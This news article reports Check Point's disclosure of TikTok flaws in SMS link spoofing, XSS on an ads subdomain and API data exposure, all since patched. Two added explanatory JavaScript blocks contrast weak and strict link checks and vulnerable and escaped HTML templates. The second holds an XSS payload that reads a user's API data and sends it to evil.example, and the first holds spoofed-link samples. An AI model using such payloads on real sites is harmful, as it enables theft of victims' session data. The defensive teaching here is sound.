Check Point Research has over the past few months seen evidence of potential risks embedded within the TikTok mobile application. The platform said it informed TikTok developers about the vulnerabilities, and they promptly devised a solution to plug the gaps.
In its report, ‘Tik or Tok? Is TikTok secure enough?’ the platform listed and detailed multiple vulnerabilities that its research teams discovered within the application.
It listed the vulnerabilities as allowing attackers to delete videos, upload unauthorised videos, make private 'hidden' videos public, and reveal personal information saved on the account such as private email addresses.
As of October last year, TikTok was one of the world’s most downloaded apps, with over a billion users. The potential for a data breach is a matter of concern because a large share of the app’s user base consists of children and teenagers, who share, save and keep private (sometimes very sensitive) videos of themselves and their loved ones.
SMS link spoofing
Detailing the vulnerabilities, Check Point said it was possible to send spoofed SMSes to any phone number on behalf of TikTok via the app’s main site, www.tiktok.com. Attackers could use this SMS function to send users custom malicious links; when clicked, such a link redirects the user to a web server controlled by the attacker, making it possible for the attacker to send requests on the user’s behalf.
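The weakness described above is a site feature that embeds a caller-supplied link in an SMS sent from the service's own sender identity. The following is an added example, not code from Check Point's report or from TikTok, showing a loose link check beside a strict one. The allow-list, the function names and the sample inputs are all assumptions; the page does not say how the real endpoint validated its input.

```javascript
// Added example (not Check Point's or TikTok's code): validating a user-supplied
// link before a server embeds it in an SMS sent under the service's own name.
// Both checks and the allow-list below are hypothetical.

const TRUSTED_HOSTS = new Set(['www.tiktok.com', 'tiktok.com']); // assumed allow-list

// Weak check: a substring match. Anything containing "tiktok.com" passes,
// including attacker domains and URLs where the trusted name is only a query
// value or the userinfo part.
function weakLinkCheck(link) {
  return link.includes('tiktok.com');
}

// Strict check: parse the URL, require https, reject credentials in the URL,
// and compare the exact hostname against the allow-list.
function strictLinkCheck(link) {
  let url;
  try {
    url = new URL(link);
  } catch (e) {
    return false; // not an absolute URL at all
  }
  if (url.protocol !== 'https:') return false;
  if (url.username || url.password) return false; // "https://www.tiktok.com@evil.example"
  return TRUSTED_HOSTS.has(url.hostname.toLowerCase());
}

// Constructed sample inputs: what an attacker might submit to a
// "send me the download link" form. Only the first is genuine.
const SAMPLES = [
  'https://www.tiktok.com/download',
  'https://tiktok.com.evil.example/app',
  'https://evil.example/?next=tiktok.com',
  'https://www.tiktok.com@evil.example/',
  'javascript:alert(1)//tiktok.com',
];

// Run one check over every sample and return a map of link -> accepted?
function evaluate(check) {
  return Object.fromEntries(SAMPLES.map(s => [s, check(s)]));
}

console.log('weak   :', evaluate(weakLinkCheck));   // every sample accepted
console.log('strict :', evaluate(strictLinkCheck)); // only the genuine URL accepted
```

The point of the strict version is that the decision is made on the parsed hostname, not on the raw string: look-alike domains, userinfo tricks and non-https schemes all fail before the allow-list is consulted. An even safer design is to not accept a URL at all and have the server pick the link from a fixed table.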
Cross-site scripting (XSS)
The researchers further found that TikTok’s subdomain https://ads.tiktok.com is vulnerable to XSS attacks, a type of attack in which malicious scripts are injected into otherwise benign and trusted websites, allowing the attacker to run code and perform actions on behalf of the victim without his or her consent.
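To make the XSS definition concrete, here is an added example, not taken from Check Point's report or from TikTok's site, of a reflected XSS in a server-side HTML template beside its hardened form. The endpoint, the parameter name, the API path and the payload are all hypothetical.

```javascript
// Added example (not Check Point's or TikTok's code): a reflected XSS and
// its fix. The route, parameter and payload are constructed for illustration.

// Vulnerable: the search term is concatenated into HTML unchanged, so a
// request such as ?q=<script>...</script> is rendered as script, not as text.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Encode the five characters that can change HTML context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Hardened: the same template, with the untrusted value encoded for HTML text.
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Constructed payload: because it runs in the trusted site's origin, it can call
// the site's own API with the victim's session and ship the response elsewhere.
const PAYLOAD =
  '<script>fetch("/api/me").then(r=>r.text())' +
  '.then(t=>fetch("https://evil.example/?d="+encodeURIComponent(t)))</script>';

// Crude check for whether the rendered markup still carries an executable tag.
// A real test would parse the DOM; this is enough to show the difference.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log(containsScriptTag(renderSearchVulnerable(PAYLOAD))); // true
console.log(containsScriptTag(renderSearchSafe(PAYLOAD)));       // false
```

Output encoding is context-specific: the table above is for HTML text and attribute values, and a value placed inside a script block, a URL or a CSS rule needs a different encoder. A Content-Security-Policy without 'unsafe-inline' is the usual second layer, since it stops an injected inline script from executing even when an encoding step is missed.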
Sensitive data exposure
Check Point also learned that attackers could make requests to the app’s subdomains https://api-t.tiktok.com and https://api-m.tiktok.com to reveal sensitive information about the user, including email addresses, payment information and birth dates.
TikTok, on its part, told the Hindu BusinessLine that it is committed to protecting user data and has patched all issues reported by Check Point in the latest version of the app. “We encourage responsible security researchers to privately disclose zero day vulnerabilities to us. Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app,” Luke Deshotels, PhD, TikTok Security Team, told the paper.